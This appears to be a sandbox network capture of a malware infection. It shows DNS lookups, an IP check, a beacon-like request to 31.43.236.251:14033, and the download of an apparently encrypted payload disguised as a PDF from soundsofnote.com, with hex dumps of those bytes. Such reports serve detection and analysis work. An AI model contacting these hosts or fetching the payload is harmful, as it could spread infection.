Feb 19, 2015 13:02:00.968655109 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968676090 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968704939 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968771935 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968776941 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968779087 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968867064 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968873978 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968889952 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968894005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.968924046 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.968954086 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969013929 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969018936 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969022989 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969027042 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969101906 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969109058 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969141960 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969168901 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969233036 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969238043 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969242096 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969244957 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969280005 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969325066 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969331980 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:02:00.969361067 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969389915 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:02:00.969391108 MEZ801032216.194.168.39192.168.1.10

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 19, 2015 13:01:47.349020958 MEZ | 192.168.1.10 | 195.186.1.121 | 0x9e5d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Feb 19, 2015 13:01:56.036761999 MEZ | 192.168.1.10 | 195.186.1.121 | 0x9ec9 | Standard query (0) | soundsofnote.com | A (IP address) | IN (0x0001)
Feb 19, 2015 13:02:45.093579054 MEZ | 192.168.1.10 | 195.186.1.121 | 0x1d4e | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Feb 19, 2015 13:02:45.235400915 MEZ | 192.168.1.10 | 195.186.1.121 | 0x5e6c | Standard query (0) | stun.stunprotocol.org | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:02.068739891 MEZ | 192.168.1.10 | 195.186.1.121 | 0x6e45 | Standard query (0) | stun.l.google.com | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:18.882558107 MEZ | 192.168.1.10 | 195.186.1.121 | 0xbfcf | Standard query (0) | stun.internetcalls.com | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:35.899051905 MEZ | 192.168.1.10 | 195.186.1.121 | 0xf27d | Standard query (0) | stun.ekiga.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Feb 19, 2015 13:01:47.398987055 MEZ | 195.186.1.121 | 192.168.1.10 | 0x9e5d | No error (0) | checkip.dyndns.org |  | 91.198.22.70 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:01:56.329562902 MEZ | 195.186.1.121 | 192.168.1.10 | 0x9ec9 | No error (0) | soundsofnote.com |  | 216.194.168.39 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:02:45.219796896 MEZ | 195.186.1.121 | 192.168.1.10 | 0x1d4e | No error (0) | google.com |  | 173.194.65.101 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:02:45.420164108 MEZ | 195.186.1.121 | 192.168.1.10 | 0x5e6c | No error (0) | stun.stunprotocol.org |  | 107.23.150.92 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:02.221060038 MEZ | 195.186.1.121 | 192.168.1.10 | 0x6e45 | No error (0) | stun.l.google.com |  | 173.194.78.127 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:19.242624998 MEZ | 195.186.1.121 | 192.168.1.10 | 0xbfcf | No error (0) | stun.internetcalls.com |  | 77.72.169.154 | A (IP address) | IN (0x0001)
Feb 19, 2015 13:03:36.020833015 MEZ | 195.186.1.121 | 192.168.1.10 | 0xf27d | No error (0) | stun.ekiga.net |  | 77.72.174.165 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

  • checkip.dyndns.org
  • 31.43.236.251:14033
  • soundsofnote.com

HTTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transferred (KB)
Feb 19, 2015 13:01:47.404910088 MEZ | 1030 | 80 | 192.168.1.10 | 91.198.22.70 | GET / HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: checkip.dyndns.org
Cache-Control: no-cache
0
Feb 19, 2015 13:01:54.938848019 MEZ | 80 | 1030 | 91.198.22.70 | 192.168.1.10 | HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 188.138.17.15</body></html>
0
Feb 19, 2015 13:01:55.676322937 MEZ | 1031 | 14033 | 192.168.1.10 | 31.43.236.251 | GET /1902uk11/377142/0/51-SP:/0/ELLBEGLBEKBEI HTTP/1.1
User-Agent: Mazilla/5.0
Host: 31.43.236.251:14033
Cache-Control: no-cache
1
Feb 19, 2015 13:01:56.334208965 MEZ | 1032 | 80 | 192.168.1.10 | 216.194.168.39 | GET /mandoc/gb_eula.pdf HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: soundsofnote.com
Cache-Control: no-cache
2
Feb 19, 2015 13:01:58.230360031 MEZ | 80 | 1032 | 216.194.168.39 | 192.168.1.10 | HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 12:01:57 GMT
Server: Apache
Last-Modified: Thu, 19 Feb 2015 10:19:49 GMT
Accept-Ranges: bytes
Content-Length: 407410
Content-Type: application/pdf
2
Data Ascii: ONsMTaa(A>V-W@j (.>Nk'^|1~EQf!1~%nm/X+q8>sG~IW;<s>bWu$6dG-YJceo71>$YLv_/ {4\Y>QofVhY3pRV
54
Feb 19, 2015 13:01:58.737787008 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c b7 d3 89 33 bf 9b 17 3e 87 11 64 be fd 93 b6 ac ce c8 1a 77 6b b4 ea b4 bd f5 26 ca af f2 97 78 e3 49 ab bd a8 c0 32 a1 85 77 6e 3e ad 9e f1 0a 0b af 34 c5 d6 ee a7 3d eb 3b e7 55 a8 a7 ab af ba 23 ad ac 8c 73 f7 3e 19 1f 37 86 5b f8 bc 1c de
Data Ascii: |3>dwk&xI2wn>4=;U#s>7[Wg`YPO#.ud^r^;$!rbhUJB=+m0a7)=,+>4O#CgA'Zc~G\Zpx$Z8zDv9~yw>yv
56
Feb 19, 2015 13:01:58.737807989 MEZ801032216.194.168.39192.168.1.10Data Raw: a5 be 94 4b 5b 22 59 ad 6b 46 f4 d2 3d de c4 ef 55 e4 f7 95 2a 36 5e be a7 95 5b ab 5c 96 34 0a 2d 40 5c ee 3e 94 ac f6 1d 7c 60 55 53 42 d5 52 fb 7e 9a 25 bc 6f f7 14 28 c7 0d f2 99 74 52 ab d5 51 fa ce fc be 8b ed 3e 2b 43 ba 8b 44 93 e4 9d cb
Data Ascii: K["YkF=U*6^[\4-@\>|`USBR~%o(tRQ>+CD+R'H6S(PVr"%a-*/>-YU~_`Fem58fO?Z>09kR5xb>^>gSDFQ4)>n`2\Vp`aw)~
57
Feb 19, 2015 13:01:58.737812042 MEZ801032216.194.168.39192.168.1.10Data Raw: 54 c0 70 56 3e 54 9e d8 d1 a2 8c 82 73 a7 a8 29 e3 73 9f 53 b5 73 b8 33 dd a4 09 3f 49 f0 f2 1b 3e b4 39 7d 36 d4 7f 85 b7 ae 4e 8b c2 76 04 fc 08 ee f8 98 4f d1 ff 4f 0a 73 78 ab b4 eb ae 53 1d db ec ee 3e 59 c3 38 9d 1c 57 9c 2f b6 23 a3 c2 78
Data Ascii: TpV>Ts)sSs3?I>9}6NvOOsxS>Y8W/#x4|[>&+is@CTZNW/~7@=k4Jc7lD]r/>,GN9Lm=P>r9BxOm@+,>$}Zd2
58
Feb 19, 2015 13:01:58.738429070 MEZ801032216.194.168.39192.168.1.10Data Raw: b0 36 43 70 e1 87 bd e8 06 a8 c7 20 fe 5b e4 24 1b a0 a0 f8 bc e6 06 33 f9 ac 3f ab aa 33 f8 72 07 ab 13 8e c7 bc db 20 ac 1c 3e dd e8 1d 82 4f 5e a9 4a 21 7b 30 11 2a d0 af 67 28 2a 85 3e 5d 72 53 d6 cf 4e 59 a0 32 63 78 96 a4 f5 e1 5e 2a f9 4b
Data Ascii: 6Cp [$3?3r >O^J!{0*g(*>]rSNY2cx^*K^\-+=:8[EnNqv|/I>@rD#z7>OOC;fMi>ExmN'w-[!dsg=pGZg70rH>7>\Q
59
Feb 19, 2015 13:01:58.738482952 MEZ801032216.194.168.39192.168.1.10Data Raw: fa 34 7f 61 be cf 7e 7e e2 ab 6b 64 ad 12 ed 6d f3 c2 3e 6c 3b 0d 0d 12 05 5a 25 d4 9a fb 8e 40 90 8d 25 cd c2 ab bf 8b 15 72 5c b6 60 a9 3e 3e 56 6c 3c 68 f6 1d 28 9b f6 c4 db 89 ba 4e 76 f3 fa 26 40 2d 62 af 47 39 11 ab 32 af a1 72 f1 44 00 31
Data Ascii: 4a~~kdm>l;Z%@%r\`>>Vl<h(Nv&@-bG92rD1~lr7^:]e>f+I 0>#CiChX}TCJKK`r?m@C&w+>tI|ep$T>&ji
61
Feb 19, 2015 13:01:58.738637924 MEZ801032216.194.168.39192.168.1.10Data Raw: 7a ab 9c c3 f2 da ae fc 48 eb fd e0 88 43 70 bd fb 8c 18 8a 56 b1 a3 9a cf ab 97 d4 6d 9d 7c 82 ae 22 3e 3d 9f 2e 2b 3c c0 30 84 05 04 e3 2e d0 17 9d 52 20 fc 12 13 53 02 da 9c f6 01 6b 90 c3 b2 05 2a b9 33 ae f7 09 fc ca d2 e7 1d 3d b3 05 0a ab
Data Ascii: zHCpVm|">=.+<0.R Sk*3=oA{X> %}<4(A3i*c0x<>.pXBx~O!!X:M$'&dw^bL c)>AF/myfYf|e4?LTgw
62
Feb 19, 2015 13:01:58.742296934 MEZ801032216.194.168.39192.168.1.10Data Raw: 6b e4 68 2e 29 c2 3c c2 0d 90 b8 ee 49 81 a4 81 38 ef c8 8f e8 96 81 a7 6f ce fc e8 2a 8b 3d f3 05 04 36 ab 74 25 44 cb bf 75 5e 2b 3e 09 72 ea b2 5b 1c f3 e3 f8 f8 7f 1a 02 8e db 00 54 9c 9e 5b 3c 71 6d 91 f8 55 af a9 fd 4a 76 34 04 b5 f1 09 ce
Data Ascii: kh.)<I8o*=6t%Du^+>r[T[<qmUJv4@Si:>t)Cm5v{ EWH=b;$o7>AhfO06cZpIufe,W>7qB^-GNGLi>B"c2\:"
64
Feb 19, 2015 13:01:58.742312908 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c d8 a3 a4 e5 47 90 8b 04 01 f7 ab 92 c9 f0 e5 3f 03 22 5c 3e 2b b5 bb 59 3a f7 30 8b 5f ed 66 f6 c1 75 a0 dc 13 fe 16 e9 5f ab a0 e0 2e be ab 3b 0f 16 13 49 b0 5b 63 3e b0 2a ef b8 32 05 d0 d7 68 ef 0a 72 eb be 5b 3c 0a fc 49 e5 61 87 b3 9f 04
Data Ascii: G?"\>+Y:0_fu_.;I[c>*2hr[<Ia8>=Jk/o/iOUS{n^Bv4r}N^W#oa+ ?p8}IYp*xY>ab</va1>J2V_JU_ZE"\Y^.w>h
65
Feb 19, 2015 13:01:58.742316008 MEZ801032216.194.168.39192.168.1.10Data Raw: 3c 7d 04 de 62 09 fb aa 14 a2 08 ed a7 2d d9 3b 76 c9 18 96 ec 08 f6 23 7c 63 ff 40 01 9c 65 73 15 1a eb ab 4b 91 bc 2a 72 5e 8f 4e 3e 1d 8f f1 85 16 7f 92 03 d2 e9 90 51 e4 2e 12 57 c9 ff 98 cc 96 0f 48 29 a9 68 6b ed 22 1d 1d 6f fb 40 ae 87 dc
Data Ascii: <}b-;v#|c@esK*r^N>Q.WH)hk"o@j*GH&>~^f*S1FAGn]o2T:8Mn>nKDJa8?5v`|\B:.=^~>A5l>p(k{<J_
66
Feb 19, 2015 13:01:58.790353060 MEZ801032216.194.168.39192.168.1.10Data Raw: 0a ac f8 26 34 e8 29 f4 28 9a 3e 83 e3 d3 23 71 21 c6 27 46 8e 85 30 49 a2 c7 14 48 00 c0 9d 37 4d c8 0f f9 79 ac 07 c4 7c 1c 6c 9f 40 88 0e b6 0e e9 6a 01 06 e5 38 13 bf ac b5 92 6d 06 4f 31 04 76 3e 73 b2 39 e8 82 15 70 e0 54 bc f5 33 88 90 20
Data Ascii: &4)(>#q!'F0IH7My|l@j8mO1v>s9pT3 /p_adX7+ E'Y(>z$^t`^EA#"A^Vo>&.Y.i5~?*DlpnC2J6Eez^>#6f4wG,B8qfP^>
67
Feb 19, 2015 13:01:58.832084894 MEZ801032216.194.168.39192.168.1.10Data Raw: 30 78 52 ac 1f 13 40 89 05 14 60 7b 3e 91 f6 4e 2d 9b c8 54 03 3f 52 7f 9f 63 08 68 46 14 fb ac bb c0 b3 a4 8f 98 e4 0e 3e 17 1f 76 01 31 7e f4 b4 3e e0 70 17 3d 9e 55 9b 3a 01 81 14 54 61 a0 7c 8a 66 ac 36 89 d8 2f ac 72 c6 09 3e 57 40 db 5f 29
Data Ascii: 0xR@`{>N-T?RchF>v1~>p=U:Ta|f6/r>W@_)HG+kPNP-MPwr_=qN[c*hieJC4sa!ETJu&=PJ<wU>^mP^$3!c_}tZhm-j7n&.j>wn]eYn
68
Feb 19, 2015 13:01:58.832108974 MEZ801032216.194.168.39192.168.1.10Data Raw: 41 9f d6 10 4d 63 33 f2 bf 34 02 0e 4c 31 2e ad a8 36 6d ac 3b e4 75 25 6a 1d f6 75 fe aa 4b a5 36 74 26 f3 ba e2 04 ac 7a 92 6e 4f 85 fa 2d 42 3e 14 c0 7d fa c2 bf 5b 2d ad 70 36 a9 35 57 a4 9b be 02 7d 8e c8 cb 22 8b 27 24 ac 31 e5 f8 d4 10 f7
Data Ascii: AMc34L1.6m;u%juK6t&znO-B>}[-p65W}"'$1x>rnC1iEBH>?r^W&*6h&A 5>9wPi9h@;|.h&>vD"EQL3-?O$6&eKnP
70
Feb 19, 2015 13:01:58.832279921 MEZ801032216.194.168.39192.168.1.10Data Raw: 59 e6 83 ef 3c 13 9f bf 01 b6 82 ef 4f ec 04 ef 29 e9 50 3b 37 25 b3 ac 98 0c 64 05 15 23 6a 2b 3e 2b fb 3e 39 28 4d c8 c2 16 47 95 2d bf 1b a1 0a e7 04 88 00 59 74 1f 8c a9 3d ac 85 d9 9e 02 41 79 81 0a 3c 8d 1f b9 74 40 75 9a 6c fc 04 78 88 dc
Data Ascii: Y<O)P;7%d#j+>+>9(MG-Yt=Ay<t@ulx2d>6)]\`&1ep]Kn#C*~G?u(89GC.,'>K(\l6J1iG{- 5=`r~zQ\vK74a<_w>B"zXKF{Pt
71
Feb 19, 2015 13:01:58.836440086 MEZ801032216.194.168.39192.168.1.10Data Raw: 46 4e 69 d2 f9 bc cb ac 13 72 d0 e0 34 c7 20 7c 3e 85 af 06 50 9f ac 3e 36 0d c4 83 3a 25 01 44 69 5c 4e 0d 3e 20 36 e7 ef 4c 93 35 78 10 c0 ae 6f b3 e7 be 66 69 05 da c8 2c 12 1a 7d 39 98 ac 78 ec 71 b4 89 7a 9c 97 3e 74 9f 37 6b 15 1c 88 85 19
Data Ascii: FNir4 |>P>6:%Di\N> 6L5xofi,}9xqz>t7k{8|4VdS>>M8V:'I`][>{VC'>Jc~g$I[}{a_:tviF"k?V(t~>\"5e}!Rl]V?bRR<0s~G>
72
Feb 19, 2015 13:01:58.836460114 MEZ801032216.194.168.39192.168.1.10Data Raw: 9b 3e f6 c6 e6 ef 06 97 4c 50 60 ad 22 99 dd ac 03 08 05 9b c1 07 78 bc 3e 74 47 ce 5e 9e 79 3b 5b 7a 30 ca a3 84 c9 c8 d9 1a 07 2b bf e9 bd ac 4a 5a 22 ad 1a 7e 72 ad 3e c1 07 d8 5e a5 47 d8 1a 82 47 88 7f c2 47 e1 cc 34 06 19 f1 79 3a 5d 14 7f
Data Ascii: >LP`"x>tG^y;[z0+JZ"~r>^GGG4y:]ff9->qQXM%)ks{6p:"i!g-~lm|>~!H8LZP>!'GE@6NyNUf8E6vK>vn8/v<5sW%
74
Feb 19, 2015 13:01:58.836463928 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 68 03 53 da 3c a0 ba 29 e1 6c 25 72 fe 11 8e d5 d7 07 53 0a 2b 54 5e a4 a6 7b ec 65 a9 50 e1 ab e2 1c a1 2d e8 48 80 7d 90 7a c7 0e e2 07 17 a8 42 08 fc 6c db db ac fe fe 73 54 0a b6 94 15 3e 7c 56 bb 58 18 95 ea a7 91 86 8f f1 f6 a5 93 3a ca
Data Ascii: >hS<)l%rS+T^{eP-H}zBlsT>|VX:>] C nifw/r7Qnq:l^jd#cc{z>1o#b:JaxC5{sa,kDHo>NO@Q8/F7T{f'\{D
74
Feb 19, 2015 13:01:58.836656094 MEZ801032216.194.168.39192.168.1.10Data Raw: 35 53 7d 1a 21 e8 18 68 e7 a7 08 b1 99 9a ff 26 3b a1 30 ac d1 d2 c8 5a 5d ec 45 a3 3e 31 3c fa f8 ee 4c de 6b 5c ab 44 39 1c a5 62 3f f6 08 ac 61 82 3e 1b 9f 70 56 af 21 64 11 a9 df 1c 0d 32 c1 de 08 0e 26 f8 82 c6 07 52 3f ac 9d 02 ee bb c0 c2
Data Ascii: 5S}!h&;0Z]E>1<Lk\D9b?a>pV!d2&R?e>=WE@DCd#$qj*oHYzK^Rwq@_%vjqP>6wt.A}qr>U<KAr}ZEEhO`rEIxW>\EaS8^+Rv;p;[=9{rsHYf
76
Feb 19, 2015 13:01:58.836673021 MEZ801032216.194.168.39192.168.1.10Data Raw: 85 07 e1 10 3b c9 fb f8 a1 d9 27 cd c8 a1 9c ac 96 e6 a9 5d 5e 08 29 e1 3e 17 67 f3 71 ae f2 c4 3b c8 d7 39 3b fe 79 bd dc 89 09 fa e6 b1 05 c2 5f 02 48 ac 04 ee 11 13 5a e5 62 22 3a 87 ce 77 2c db 4d d3 1b d5 09 e1 07 ed 17 57 5b aa 49 ac fb 6d
Data Ascii: ;']^)>gq;9;y_HZb":w,MW[Im8+>(RB!UZaQ0hoL,9NZN_QP>^<2MfXAxSZl!{><\3iuQ>GIkW_c?73xIN
77
Feb 19, 2015 13:01:58.836801052 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 0a 07 4a 1c a5 98 f6 17 2f 08 7c 38 01 a3 87 12 cf 07 b5 0b bd 55 a6 3b 1b 20 85 0b 34 0d dd fa 55 ed 38 dd 47 0b f3 4e 86 25 9f 86 1c 38 ac 50 9c 4a c3 73 7f e0 0b 3e 39 36 4e 5f 7f db 32 b3 3d 95 39 dd 95 0c 45 7f 72 0b 86 05 3c c6 36 99 3e
Data Ascii: >J/|8U; 4U8GN%8PJs>96N_2=9Er<6>m;pvm4kGc %=mofkP>s:Pmr6)sbSkIUm4>h('^Yq"G_.laO28g|.~Hip>~gz1
78
Feb 19, 2015 13:01:58.842396021 MEZ801032216.194.168.39192.168.1.10Data Raw: c8 3e 6d 9c 03 be be b5 20 01 f9 ab 33 51 01 25 0d 95 3a 77 5f 4e 73 c5 99 5e 3e 44 67 9d f6 73 2b 7e 5f 26 6e 29 7c 80 84 68 12 48 0c 09 21 db 76 0a 64 c1 d9 ac 5e 66 e8 4c 1c 45 65 c7 3e b4 00 26 b3 6b 8d 2d 2b 2f 15 ca c2 b1 4d f3 f2 47 0c c5
Data Ascii: >m 3Q%:w_Ns^>Dgs+~_&n)|hH!vd^fLEe>&k-+/MGW8g#=y8qOi~4r>*+0Q}=rxz.6 p9duLGf)>$_R} M>OaK_S1O LTz>MOM~aTPlRIR9lp
79
Feb 19, 2015 13:01:58.870721102 MEZ801032216.194.168.39192.168.1.10Data Raw: 7b d6 04 c0 28 b9 17 b3 e8 bc 93 c0 3e c5 8a 5f 3c 50 ec 52 f9 9f 40 d8 39 d8 bc bc 22 38 0c 28 bc 37 59 14 2f 02 86 ac 75 08 93 a9 89 59 6c b2 36 54 6a 22 25 85 b3 55 c7 1f 0c d0 c3 24 1b 10 ef 6d 32 ac 2e 33 fa 77 81 a8 22 ae 3e 48 9c cd ed 4c
Data Ascii: {(>_<PR@9"8(7Y/uYl6Tj"%U$m2.3w">HLTIn8<ye$?>ILNW8].8<PU>rleJT~sGjddt5Fb'^M2IS>#G"Wp^v`qw*>w!H>Z
80
Feb 19, 2015 13:01:58.870732069 MEZ801032216.194.168.39192.168.1.10Data Raw: 8f fa c2 da a7 5a 02 5b d0 f6 0d 55 3d fb 6a bb 3c 0b 7c 97 e1 4c fa 01 7d 58 0e f8 27 15 66 33 d8 7a f7 ac 9e 43 44 25 08 4d 17 7a 3e 28 f5 6b 6c 39 f8 ee cc 14 74 b3 e6 07 61 13 1b d2 0e c3 9f 27 9a 4f 50 6c 3d ac 74 fd 1a 44 fa 00 8a 46 3e 93
Data Ascii: Z[U=j<|L}X'f3zCD%Mz>(kl9ta'OPl=tDF>Er}s~8{>ER"i]Z(V|YT>u7+8&rEn";q^V;Aw2/'?6$>'sD9YP8~^\?w,C4?N^1T]I
82
Feb 19, 2015 13:01:58.870907068 MEZ801032216.194.168.39192.168.1.10Data Raw: 76 26 67 a2 b3 cb 0f 02 70 7b 22 64 5c ea 73 ac 2d 29 97 98 22 89 c8 dd 3e 15 e7 11 85 b3 aa b4 1e 7c d7 0d 4b 77 d1 e4 73 9a 0f 35 ee 4d 92 09 5a 90 82 ac 34 cf fa 2b d4 e4 0e ed 3e c2 2b ad 7f 85 4e 88 4a c5 2b 88 3f a2 0e d8 3e 91 7b ac 5e ac
Data Ascii: v&gp{"d\s-)">|Kws5MZ4+>+NJ+?>{^N+>NIA`g&L/M4M>!<``Mw%OW<>*uIsE%zuJPhLm>-]%3zY]N%>t]=#,pw
83
Feb 19, 2015 13:01:58.930738926 MEZ801032216.194.168.39192.168.1.10Data Raw: de f3 53 d3 68 49 6d 0c 3e 86 b7 c0 b4 8a 53 f3 0a f1 0d 34 a8 e4 3c 9b c3 28 18 ac 2f e3 4b c4 e4 c8 31 9c 3e b2 ac da 47 34 33 19 ae 78 2f a4 cf 57 0e 93 7a c6 10 7a 66 2e d0 5a ab 86 6b ac 83 92 95 7a 54 ec 51 2a 3e 1d 43 7a 50 79 51 cc 69 81
Data Ascii: ShIm>S4<(/K1>G43x/Wzzf.ZkzTQ*>CzPyQiN7CN9rC>^BvWe6LwpF><p_xu3jn4p,DvI/n2g{#|[js[>N#:o5x#e=U]3X
84
Feb 19, 2015 13:01:58.931729078 MEZ801032216.194.168.39192.168.1.10Data Raw: b4 ce ec 97 10 fd 28 0a c6 92 df bc 5d bc ff a0 33 b1 62 40 54 91 2e ef 76 8d 93 80 86 d6 85 a5 10 93 4d 7e a1 0f 69 4d e1 ac f7 f4 54 0f 92 a6 75 5d 3e 6e af ff dd 48 0f 7c 2f f8 10 cf b8 63 ba 15 bf 38 d0 ac 99 c6 ad 78 fa 03 14 55 3a fd a6 03
Data Ascii: (]3b@T.vM~iMTu]>nH|/c8xU:ps/>OQV|*+X4<D,X:;XvYi<L71>Yd5CMP}:mh\,MDQ=e:Yq]LYmpNR>'lm"KPcKAsx
85
Feb 19, 2015 13:01:58.931746006 MEZ801032216.194.168.39192.168.1.10Data Raw: ab af 1d ab 5a 76 5e 58 53 66 4f 08 69 c3 70 df 12 0a d2 94 d9 2c 2f d7 71 ac ef 63 93 db 65 d7 bd ea 3e d4 e5 04 38 46 0b 05 3f 61 c6 64 86 13 17 d1 0e 5f 92 cd 13 f7 16 c7 e7 11 6d 2a 3f 4c 17 b4 85 be 6b ed 22 66 12 c5 8f 1f 53 47 ae e5 12 ac
Data Ascii: Zv^XSfOip,/qce>8F?ad_m*?Lk"fSGZ)(:%>=>z.6p6?VJsJ^PS>QS7SMwFE4{eL?>JYBMa!-2>&>#q*j.N){p>rV%#z`/
87
Feb 19, 2015 13:01:58.931946039 MEZ801032216.194.168.39192.168.1.10Data Raw: b2 61 4b 45 09 ac 66 cc 20 b1 81 06 2f 3b 3c e4 68 a7 2f d4 66 08 0a 0b 13 ce 97 ef 89 b4 75 d2 c8 ac 33 25 50 98 2d e3 d7 8c 3e 83 d0 2e 96 35 f2 01 52 f0 7a f4 c4 b3 08 b7 36 99 2c ac c8 c9 73 af 26 05 1f 21 3e 1e 31 57 9b 20 32 f5 ad d7 bf f5
Data Ascii: aKEf /;<h/fu3%P->.5Rz6,s&!>1W 2vTS'i)&:w.7X)8}$gtW>sPMCeTvujJvEw|F6sSy1>!kO)ghzC*4@x^@6
87
Feb 19, 2015 13:01:58.936877012 MEZ801032216.194.168.39192.168.1.10Data Raw: 03 37 3c 38 cf 09 2d 9a b2 4c 22 5a 14 76 8f 56 67 62 71 a8 ab ac ab 7c 21 f7 9f 67 89 47 3e 09 f3 40 78 5d 03 e1 29 59 45 3d aa 2d 11 c5 3b b8 34 93 3e ff 86 cc eb 42 4c d5 68 46 bc 24 50 79 67 ed 51 09 d4 ff 0a 94 e8 cc 3c 25 17 c5 3d 4b df c3
Data Ascii: 7<8-L"ZvVgbq|!gG>@x])YE=-;4>BLhF$PygQ<%=Ks_PY?k>>sMxJ6T QEl%so'+^y?WO-z)k>W7ZbCS"m|0f>h:mP;Fm5>^Y1ptw=@e
89
Feb 19, 2015 13:01:58.936894894 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 1a a6 d6 ad 8c e7 d1 80 b8 cc bc 4a 27 46 a8 b4 3b 07 2c 7c de 1e 2d 15 29 b0 25 fc 13 4e 4a c0 ac 11 ed a5 3d c3 8c be 19 3e 5d 0c 37 24 a5 1c 29 86 b1 b0 35 82 ee 61 09 54 cf 35 bc 5a 74 d0 33 22 18 4d 5f 3e 53 20 5f 27 bc d8 8a ae b8 92 a4
Data Ascii: VJ'F;,|-)%NJ=>]7$)5aT5Zt3"M_>S _'1O[:~j>uHf:oCDhqSnsgCJ>Lx'`3E0.HZ~%Vu;JZ:QsgY7V.V.:>i
90
Feb 19, 2015 13:01:58.936897993 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c 5c 3e b5 37 10 d3 4e 34 5a e8 14 90 c2 2f 76 9c 7c 0c 9a 17 60 c1 1a 11 12 a3 76 20 ac 5d ad 72 9e fe 82 5c e1 3e 86 27 b3 fa b0 a9 c3 07 1d 26 e8 62 28 b2 d6 3b 00 17 d2 7f f6 2a 9a 0a ee 55 b4 b3 30 e4 13 64 e9 12 7d 8f c4 17 56 5e 38 e0 e5
Data Ascii: |\>7N4Z/v|`v ]r\>'&b(;*U0d}V^8O|U>RDH+HIk05m[62/+;^F6>~6k9m;prU4/1>EwBdz'\z]8f;"G]ri%f>
91
Feb 19, 2015 13:01:58.937202930 MEZ801032216.194.168.39192.168.1.10Data Raw: 53 9f d9 52 17 ad 31 59 a2 43 28 f5 c9 ac f5 2d a1 ea 9a fb 70 65 3e b0 96 de 0e 43 af f5 eb 8d c4 bb eb a8 b7 b7 7f 0a 17 97 df 19 8a 29 5d 58 29 b4 7a 0f 10 93 3b aa 12 65 00 d5 17 ed 2f 2a 5a 00 9b ca 9a ac c7 19 2a fc d5 b6 f3 c6 3e 49 65 d1
Data Ascii: SR1YC(-pe>C)]X)z;e/*Z*>IepE!t[iq>|~^$~Qq5H]=|pe6>wZt!$+2~F`rTI|&UR!AR4Nk>hV+.#a:
92
Feb 19, 2015 13:01:58.937221050 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b cb 3e 19 be 5a 7a 0a 9c ca 0a b5 ad e7 2c 1a 1f 05 65 e7 3c ac 7f d1 38 53 a7 c9 8d 95 3e cc 37 99 b4 bf 83 2a 95 fc 56 a5 fc a6 34 d9 94 76 58 c6 32 7c ce e7 03 1b 16 4f 3e 45 bc bc d2 7c 58 88 53 03 de f7 db b5 f4 40 c3 82 19 d7 3e 7f f2 46
Data Ascii: ;>Zz,e<8S>7*V4vX2|O>E|XS@>FLzt&>.yQ]N;Wi*De6^euWG<Gm>@V$2n6U4.h[#K;<[Gd0v*)*lU[/
94
